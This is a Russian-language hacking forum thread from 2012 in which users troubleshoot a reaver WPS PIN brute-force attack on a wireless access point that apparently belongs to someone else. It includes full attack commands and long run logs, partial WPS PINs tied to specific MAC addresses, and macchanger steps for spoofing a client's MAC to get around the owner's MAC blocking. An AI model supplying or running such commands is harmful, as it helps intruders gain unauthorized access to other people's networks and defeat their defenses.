HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Беспроводные технологии/Wi-Fi/Wardriving
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #341  
Старый 17.11.2012, 01:00
seonan
New Member
Регистрация: 01.11.2012
Сообщений: 1
Провел на форуме:
217

Репутация: 0
По умолчанию

WPS PIN для таких MAC точек доступа:

54:04:A6:5D:50... 238373##

F81:11:32:1F... 961446##

B0:48:7A:F5:7B... 090061##
 
Ответить с цитированием

  #342  
Старый 19.11.2012, 12:45
pav087
New Member
Регистрация: 15.11.2012
Сообщений: 27
Провел на форуме:
5129

Репутация: 0
По умолчанию

Привет всем!

Может поможете чем...

Есть точка доступа,сигнал от -65 до ~-50db, мак 80:1F:02:06:x:x видимо точка Edimax.

Мой девайс TL-WN7200ND. Пользуюсь Wifislax 4.3, но также пробовал BT5R2,3. Начал ривером подбирать пин (reaver -i mon0 -b ... -c 9):

Код:
Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner 
[+] Waiting for beacon from 80:1F:02:06:x:x
[+] Associated with 80:1F:02:06:x:x (ESSID: TTk)
[+] Trying pin 12345670
[+] Trying pin 00005678
[+] Trying pin 01235678
[+] Trying pin 11115670
[+] Trying pin 11115670
[+] Trying pin 22225672
[+] 0.05% complete @ 2012-11-09 22:45:38 (2 seconds/pin)
Через некоторое время стали появляться ошибки, причем по логу видно что где-то через час и до утра:

Код:
[+] Trying pin 12985678
[!] WARNING: 25 successive start failures
[+] Trying pin 12985678
[!] WARNING: 25 successive start failures
[+] Trying pin 12985678
[!] WARNING: 25 successive start failures
[+] 11.87% complete @ 2012-11-09 23:43:35 (2 seconds/pin)
[+] Trying pin 12985678
[!] WARNING: 25 successive start failures
[+] Trying pin 12985678
[!] WARNING: 25 successive start failures
[+] Trying pin 12985678
[!] WARNING: 25 successive start failures
[+] Trying pin 12985678
[!] WARNING: 25 successive start failures
[+] Trying pin 12985678
[!] WARNING: 25 successive start failures
[+] 11.87% complete @ 2012-11-09 23:53:48 (3 seconds/pin) 
...
[+] 11.87% complete @ 2012-11-10 09:57:27 (30 seconds/pin)
[+] Trying pin 12985678
[!] WARNING: 25 successive start failures
[!] WARNING: 10 failed connections in a row
[+] Trying pin 12985678
[!] WARNING: 25 successive start failures
[+] Trying pin 12985678
[!] WARNING: 25 successive start failures
[+] Trying pin 12985678
И тепер уже вторую неделю вот так (reaver -i mon0 -b ... -c 9 -vv):

Код:
Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner 
[+] Switching mon0 to channel 9
[+] Waiting for beacon from 80:1F:02:06:x:x
[+] Associated with 80:1F:02:06:x:x (ESSID: TTk)
[+] Trying pin 12345670
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
Wash все это время показывает wps no на этой точке (TTk). Также пробовал другие wifi девайсы, добавлял команды essid, уменьшал время -d...

С другими точками подбор идет...

Из за чего может быть эта ошибка-Receive timeout occurred??

Заранее Спасибо!
 
Ответить с цитированием

  #343  
Старый 19.11.2012, 13:49
Buran
Познавший АНТИЧАТ
Регистрация: 25.02.2011
Сообщений: 1,148
Провел на форуме:
353490

Репутация: 110


По умолчанию

Цитата:
Сообщение от pav087  

...

Из за чего может быть эта ошибка-Receive timeout occurred??

Заранее Спасибо!

Думается варианта тут всего два:

1) Точку переставили в другое место, или просто уровень сигнала упал. Можно (нужно) проверить.

2) Включили блокировку по МАС-адресу. Надо сменить МАС на интерфейсе mon0.
 
Ответить с цитированием

  #344  
Старый 19.11.2012, 15:30
pav087
New Member
Регистрация: 15.11.2012
Сообщений: 27
Провел на форуме:
5129

Репутация: 0
По умолчанию

Цитата:
Сообщение от Buran  

Думается варианта тут всего два:

1) Точку переставили в другое место, или просто уровень сигнала упал. Можно (нужно) проверить.

2) Включили блокировку по МАС-адресу. Надо сменить МАС на интерфейсе mon0.

Сигнал до точки остался такой-же, даже в некоторых местах доходит до -45db.

По мак блокировку думаю маловероятно, после этого с других wifi карт пробовал, тоже самое получалось... На точке есть клиент, я пробовал подставлять в ривер мак клиента через команду -m...

Делал так:

Код:
ifconfig wlan0 down
macchanger -m (мак клиента) wlan0
ifconfig wlan0 up
airmon-ng start wlan0 
reaver -i mon0 -b (мак точка) -c 9 -m (мак клиента) -vv
handshake ловится практически сразу, но брут не помогает...
 
Ответить с цитированием

  #345  
Старый 19.11.2012, 16:00
теща
Постоянный
Регистрация: 14.09.2005
Сообщений: 415
Провел на форуме:
1052005

Репутация: 131
По умолчанию

тема для брута http://forum.antichat.ru/thread274700.html
 
Ответить с цитированием

  #346  
Старый 19.11.2012, 16:04
Buran
Познавший АНТИЧАТ
Регистрация: 25.02.2011
Сообщений: 1,148
Провел на форуме:
353490

Репутация: 110


По умолчанию

Цитата:
Сообщение от pav087  

Делал так...

Нужно сменить МАС-адрес на интерфейсе. Делаем так:

Код:
ifconfig mon0 down
macchanger -m 00:01:02:aa:bb:cc mon0
ifconfig mon0 up
Это будет совсем другое дело. Macchanger берём здесь если нету.
 
Ответить с цитированием

  #347  
Старый 19.11.2012, 17:11
pav087
New Member
Регистрация: 15.11.2012
Сообщений: 27
Провел на форуме:
5129

Репутация: 0
По умолчанию

Цитата:
Сообщение от Buran  

Нужно сменить МАС-адрес на интерфейсе. Делаем так:

Код:
ifconfig mon0 down
macchanger -m 00:01:02:aa:bb:cc mon0
ifconfig mon0 up
Это будет совсем другое дело. Macchanger берём здесь если нету.

Ок, спасибо попробую так. Да и вопрос, а в reaver команду -m надо будет после этого добавлять?
 
Ответить с цитированием

  #348  
Старый 20.11.2012, 09:02
Buran
Познавший АНТИЧАТ
Регистрация: 25.02.2011
Сообщений: 1,148
Провел на форуме:
353490

Репутация: 110


По умолчанию

Цитата:
Сообщение от pav087  

Ок, спасибо попробую так. Да и вопрос, а в reaver команду -m надо будет после этого добавлять?

Нет.
 
Ответить с цитированием

  #349  
Старый 20.11.2012, 10:36
pav087
New Member
Регистрация: 15.11.2012
Сообщений: 27
Провел на форуме:
5129

Репутация: 0
По умолчанию

Цитата:
Сообщение от Buran  

Нет.

В общем попробовал с маком клиента, та же беда и когда клиент есть, и когда нету, сыпятся ошибки - [!] WARNING: Receive timeout occurred... Сигнал до точки ~ -59db. Клиента ~ -56db.

Может точка заблокировала WPS до перезагрузки?

Ведь как только начал подбирать, дошло до 11% за час...

Может есть какие-нибудь еще идеи?
 
Ответить с цитированием

  #350  
Старый 20.11.2012, 12:10
Buran
Познавший АНТИЧАТ
Регистрация: 25.02.2011
Сообщений: 1,148
Провел на форуме:
353490

Репутация: 110


По умолчанию

Цитата:
Сообщение от pav087  

Может есть какие-нибудь еще идеи?
На какой МАС меняли в интерфейсе mon0? Попробуйте вообще не менять МАС. Иногда помогает.
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.